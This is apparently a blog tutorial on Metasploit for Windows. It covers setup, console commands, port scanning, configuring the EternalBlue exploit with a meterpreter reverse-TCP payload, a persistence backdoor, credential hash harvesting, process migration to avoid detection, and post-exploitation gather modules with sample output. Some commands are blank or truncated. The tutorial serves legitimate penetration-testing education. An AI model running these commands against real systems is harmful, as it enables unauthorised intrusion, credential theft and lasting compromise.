Metasploit for Windows

Metasploit for Windows is a penetration testing framework that allows security professionals to exploit vulnerabilities in Windows systems. It provides a collection of tools, exploits, and payloads that can be used to test the security of Windows hosts. By identifying and leveraging security gaps, Metasploit enables security teams to gain access, test defenses, and understand potential security risks within a Windows environment.

This blog covers using Metasploit on Windows, including setup, essential commands, and the pre-and post-exploitation phases.

Why Use Metasploit on Windows?

Using Metasploit on Windows offers several advantages for penetration testing and security assessments. Windows provides a familiar and user-friendly interface, making it easier for users who are already comfortable with the platform. Metasploit’s compatibility with Windows allows seamless integration with other tools and applications native to the operating system.

Additionally, Windows environments are common in enterprise networks, so running Metasploit on Windows can simulate real-world attacks more accurately. This setup also enables testing in mixed-OS environments, where both Windows and Linux systems may be present, enhancing the scope of penetration testing.

Setting up Metasploit on Windows

To set up Metasploit on Windows, ensure the system meets the following hardware and software requirements: at least 4GB of RAM, 1GB of available disk space, and Windows 7 or later. Download the Metasploit installer from the official Rapid7 website and run the file to begin the installation.

Follow the prompts to choose the installation path and the necessary options. After installation, configure the environment for optimal performance, including setting up the database and environment variables. To initialize the database, open a command prompt or the Metasploit Console and run the following command:

This command starts the PostgreSQL database, which Metasploit relies on to store and manage data collected during penetration testing activities. After the database is initialized, verify the connection to ensure proper setup before beginning any tests.

Essential Metasploit Commands for Windows

Here are some essential Metasploit commands for Windows that every penetration tester should know:

msfconsole

This command starts the Metasploit Framework console, giving access to a wide range of exploits and tools.

search <keyword>

It helps find modules related to a particular vulnerability or attack type. Replace <keyword> with specific terms to narrow the search.

use exploit/<exploit_name>

Selects a specific exploit module from the Metasploit library. Replace <exploit_name> with the name of the exploit.

set RHOST <target_ip>

Sets the remote host (target IP) where the exploit will be directed. Replace <target_ip> with the IP address of the target.

set

exploit

Executes the selected exploit against the target with the defined parameters and payload.

sessions -i <session_id>

Lists and interacts with active sessions opened by successful exploits. Use <session_id> to specify a particular session to control.

sessions -i

By understanding and using these commands, security teams can effectively navigate the Metasploit console to exploit vulnerabilities in a target system.

Pre-Exploitation

Pre-exploitation is the phase in penetration testing where security professionals gather detailed information about the target system to identify potential vulnerabilities and attack vectors. This phase involves reconnaissance and scanning activities to map the target’s network, services, and applications. Key tasks include identifying open ports, active services, operating system details, and potential entry points such as weak authentication mechanisms or outdated software versions.

Information Gathering

Information gathering forms the foundation of successful penetration testing, enabling security professionals to collect crucial data about the target system and network.

Network Scanning

To perform a network scan and identify live hosts and open ports, use the following command:

use auxiliary/scanner/portscan/tcp
set RHOSTS <target_range>
set PORTS 1-65535

This command initiates a TCP port scan over the specified range (RHOSTS). It defines the range of ports (e.g., 1-65535) with PORTS and executes the scan to discover open ports.

Service Fingerprinting

To identify services running on discovered hosts, use this command:

use auxiliary/scanner/http/http_version
set

This auxiliary module fingerprints HTTP services. It uses RHOSTS to specify the target range and provides detailed information on HTTP versions and server details for each host in the range when executed.

Windows Exploits

To find exploits for Windows, use the following command in Metasploit:

This command searches for all available Windows exploits within the Metasploit Framework. It helps to quickly identify which exploits are relevant to the target's platform.

Once an exploit is identified, configure and prepare it for use:

use exploit/windows/smb/ms17_010_eternalblue
set RHOST <target_ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <your_ip>
set

Use loads the specified exploit module. Set RHOST specifies the target's IP, and set PAYLOAD determines how the reverse connection is established. LHOST is set to your IP to receive the connection, and LPORT defines the listening port.

Finally, execute the exploit:

This command runs the configured exploit against the specified target, attempting to exploit the vulnerability and deliver the payload.

Post-Exploitation

Post-exploitation is the phase in penetration testing that occurs after gaining initial access to a system. During this phase, the focus shifts from breaking into the system to understanding the scope and impact of the compromise. Security professionals attempt to escalate privileges, move laterally across the network, and gather sensitive data like passwords, files, or confidential information.

Payloads

Payloads and post-exploitation techniques allow attackers to maintain access and extract valuable information from compromised systems. Let’s explore various payload types and post-exploitation methods available in Metasploit for Windows.

Types of Payloads

In Metasploit, you can choose various payloads to deliver the exploit. For example, to use the Meterpreter reverse TCP payload, use this command:

This command selects the reverse_tcp payload, which creates a reverse connection from the target system to the attacker's machine, providing a Meterpreter shell.

Using Meterpreter

After exploiting a target, Meterpreter allows advanced control over the system:

sessions -i

sessions -i interacts with the open session. sysinfo shows system details, and getuid retrieves the user ID of the session.

Persistence and Data Extraction

For maintaining access and extracting data:

run persistence -U -i 5 -p <your_port> -r

Run persistence sets up a persistent backdoor that reconnects every 5 minutes. Download fetches files from the compromised system and sends them to the local machine.

Metasploit Post-Exploitation Modules

Metasploit provides several post-exploitation modules that security teams can use to gather more information about the target network.

arp_scanner

Use the arp_scanner post module to perform an ARP scan for a specified range through a compromised host. This module helps discover other devices on the network.

meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

[*] Running module against V-MAC-XP
[*] ARP Scanning 192.168.1.0/24
[*] 	IP: 192.168.1.1 MAC b2:a8:1d:e0:68:89
[*] 	IP: 192.168.1.2 MAC 0:f:b5:fc:bd:22
[*] 	IP: 192.168.1.11 MAC 0:21:85:fc:96:32
[*] 	IP: 192.168.1.13 MAC 78:ca:39:fe:b:4c
[*] 	IP: 192.168.1.100 MAC 58:b0:35:6a:4e:cc
[*] 	IP: 192.168.1.101 MAC 0:1f:d0:2e:b5:3f
[*] 	IP: 192.168.1.102 MAC 58:55:ca:14:1e:61
[*] 	IP: 192.168.1.105 MAC 0:1:6c:6f:dd:d1
[*] 	IP: 192.168.1.106 MAC c:60:76:57:49:3f
[*] 	IP: 192.168.1.195 MAC 0:c:29:c9:38:4c
[*] 	IP: 192.168.1.194 MAC 12:33:a0:2:86:9b
[*] 	IP: 192.168.1.191 MAC c8:bc:c8:85:9d:b2
[*] 	IP: 192.168.1.193 MAC d8:30:62:8c:9:ab
[*] 	IP: 192.168.1.201 MAC 8a:e9:17:42:35:b0
[*] 	IP: 192.168.1.203 MAC 3e:ff:3c:4c:89:67
[*] 	IP: 192.168.1.207 MAC c6:b3:a1:bc:8a:ec
[*] 	IP: 192.168.1.199 MAC 1c:c1:de:41:73:94
[*] 	IP: 192.168.1.209 MAC 1e:75:bd:82:9b:11
[*] 	IP: 192.168.1.220 MAC 76:c4:72:53:c1:ce
[*] 	IP: 192.168.1.221 MAC 0:c:29:d7:55:f
[*] 	IP: 192

The command meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24 initiates an ARP scan across the specified subnet (192.168.1.0/24). It identifies active devices within that range, displaying their IP and MAC addresses. The arp_scanner module within Metasploit's Meterpreter session provides a quick way to map devices on the local network, useful for identifying potential targets or understanding the network topology.

checkvm

With the checkvm post module, you can determine if the compromised host is running on a virtual machine. This module supports Hyper-V, VMWare, VirtualBox, Xen, and QEMU virtual machines.

meterpreter > run post/windows/gather/checkvm

[*] Checking if

The command meterpreter > run post/windows/gather/checkvm is used to determine if the compromised system is running within a virtual machine (VM). In this example, it checks the machine and confirms that it is a VMware virtual machine. Identifying the presence of a VM is important for understanding the environment, as penetration testers and attackers may adjust their techniques if they detect a virtualized environment.

credential_collector

The credential_collector module allows you to harvest password hashes and tokens from the compromised host. This is useful for further exploitation and lateral movement.

The command meterpreter > run post/windows/gather/credentials/credential_collector is used to collect credentials from the target Windows machine. It extracts password hashes and security tokens from the system.

In this case, the command retrieves NTLM hashes for various user accounts, such as Administrator and Guest. It also lists available tokens for different system services like LOCAL SERVICE and SYSTEM. The collected credentials can be used for further attacks, such as privilege escalation or lateral movement within a network.

dumplinks

By using the dumplinks module, you can parse the .lnk files in a user's Recent Documents folder. This information can be valuable for understanding the user's recent activity. Note that you must first migrate into a user process before running this module.

meterpreter > run post/windows/manage/migrate

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1096)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1824
[*] New server process: Explorer.EXE (1824)
meterpreter > run post/windows/gather/dumplinks

[*] Running module against V-MAC-XP
[*] Extracting lnk files for user Administrator at C:\\Documents and Settings\\Administrator\\Recent\\...
[*] Processing: C:\\Documents and Settings\\Administrator\\Recent\\developers_guide.lnk.
[*] Processing: C:\\Documents and Settings\\Administrator\\Recent\\documentation.lnk.
[*] Processing: C:\\Documents and Settings\\Administrator\\Recent\\Local Disk (C).lnk.
[*] Processing: C:\\Documents and Settings\\Administrator\\Recent\\Netlog.lnk.
[*] Processing: C:\\Documents and Settings\\Administrator\\Recent\\notes (2).lnk.
[*] Processing: C:\\Documents and Settings\\Administrator\\Recent\\notes.lnk.
[*] Processing: C:\\Documents and Settings\\Administrator\\Recent\\Release.lnk.
[*] Processing: C:\\Documents and Settings\\Administrator\\Recent\\testmachine_crashie.lnk.
[*] Processing: C:\\Documents and Settings\\Administrator\\Recent\\user manual.lnk.
[*] Processing: C:\\Documents and Settings\\Administrator\\Recent\\user's guide.lnk.
[*] Processing: C:\\Documents and Settings\\Administrator\\Recent\\{33D9A762-90C8-11d0-BD43-00A0C911CE86}_load.lnk.
[*] No Recent Office files found for user Administrator. Nothing to do.
meterpreter >

The meterpreter > run post/windows/manage/migrate command migrates the Meterpreter session from its current process (svchost.exe) to a more stable one like explorer.exe. This process migration is done to maintain access and avoid detection, as explorer.exe is less likely to be terminated by system defenses.

The meterpreter > run post/windows/gather/dumplinks command gathers .lnk (shortcut) files from the Recent folder of a specific user (in this case, Administrator). This allows the tester to see recently accessed files, potentially revealing sensitive information or user activity that could aid in further exploitation.

enum_applications

The enum_applications module enumerates the applications installed on the compromised host. This helps in identifying potential targets for further exploitation.

meterpreter > run post/windows/gather/enum_applications

[*] Enumerating applications installed on WIN7-X86

Installed Applications
======================

 Name                                                              Version
 ----                                                              -------
 Adobe Flash Player 25 ActiveX                                     25.0.0.148
 Google Chrome                                                     58.0.3029.81
 Google Update Helper                                              1.3.33.5
 Google Update Helper                                              1.3.25.11
 Microsoft .NET Framework 4.6.1                                    4.6.01055
 Microsoft .NET Framework 4.6.1                                    4.6.01055
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148    9.0.30729.4148
 MySQL Connector Net 6.5.4                                         6.5.4
 Security Update for Microsoft .NET Framework 4.6.1 (KB3122661)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3127233)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3136000v2)  2
 Security Update for Microsoft .NET Framework 4.6.1 (KB3142037)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3143693)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3164025)    1
 Update for Microsoft .NET Framework 4.6.1 (KB3210136)             1
 Update for Microsoft .NET Framework 4.6.1 (KB4014553)             1
 VMware Tools                                                      10.1.6.5214329
 XAMPP 1.8.1-0                                                     1.8.1-0

[*] Results stored in

The output of the run post/windows/gather/enum_applications command shows a list of installed applications on the compromised Windows machine (WIN7-X86). Each application is listed by name and version, which can help the attacker identify potentially vulnerable software to exploit further. For example, outdated versions of Adobe Flash Player, Google Chrome, .NET Framework, and other programs may have known vulnerabilities. Security updates and patches for .NET Framework are also listed, providing a full overview of the software environment. The results are saved in a file for further review.

enum_logged_on_users

You can use the enum_logged_on_users post module to get a list of current and recently logged-on users, along with their SIDs. This information is useful for understanding user activity and privileges.

meterpreter > run post/windows/gather/enum_logged_on_users

[*] Running against session 1

Current Logged Users
====================

 SID                                            User
 ---                                            ----
 S-1-5-21-628913648-3499400826-3774924290-1000  WIN7-X86\\victim
 S-1-5-21-628913648-3499400826-3774924290-1004  WIN7-X86\\hacker

[*] Results saved in: /root/.msf4/loot/20170501172925_pwk_192.168.0.6_host.users.activ_736219.txt

Recently Logged Users
=====================

 SID                                            Profile Path
 ---                                            ------------

The run post/windows/gather/enum_logged_on_users command in Meterpreter identifies both the currently active and recently logged-on users on a Windows system. It provides the SID (Security Identifier) and User for active sessions, indicating which accounts are logged in.

It also lists recently logged-on users with their profile paths, including both user and system accounts like LocalService and NetworkService. This information is saved to a file for further analysis, offering insight into the users who have accessed the machine.

usb_history

By using the usb_history module, you can enumerate the USB drive history on the compromised system. This helps in identifying removable drives that have been connected to the system.

meterpreter > run post/windows/gather/usb_history

[*] Running module against V-MAC-XP
[*]
   C:	                                                             Disk ea4cea4c
   E:	STORAGE#RemovableMedia#8&3a01dffe&0&RM#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
   A:	FDC#GENERIC_FLOPPY_DRIVE#6&1435b2e2&0&0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
   D:	IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

[*] Kingston DataTraveler 2.0 USB Device
=====================================================================================
   Disk lpftLastWriteTime	                    Thu Apr 21 13:09:42 -0600 2011
 Volume lpftLastWriteTime	                    Thu Apr 21 13:09:43 -0600 2011
             Manufacturer	                            (Standard disk drives)
           ParentIdPrefix	                                      8&3a01dffe&0 (   E:)
                    Class	                                         DiskDrive
                   Driver	       {4D36E967-E325-11CE-BFC1-08002BE10318}\\0001

The output of run post/windows/gather/usb_history in Metasploit provides details about the USB devices that have been connected to the target machine. It includes information like the drive letters assigned (e.g., C:, E:), the device types (e.g., removable media, disk drives), and specific details such as the manufacturer, last write times, and volume information. This data can help trace the usage of USB devices and identify external drives connected to the system, which could be useful in forensic analysis or incident response scenarios.

Final Thoughts

Mastering Metasploit significantly boosts penetration testing capabilities by offering a comprehensive suite of tools for various phases of testing, from information gathering to exploitation and post-exploitation.

Utilizing its vast array of modules, testers can efficiently identify vulnerabilities and launch targeted attacks. To conduct effective penetration tests, it is essential to thoroughly understand Metasploit’s functionalities and apply them strategically. Regular practice, combined with the exploration of new modules and features, is crucial for refining skills. Staying updated on the latest vulnerabilities and exploits ensures that testers can respond proactively to emerging threats, maximizing the impact of their assessments.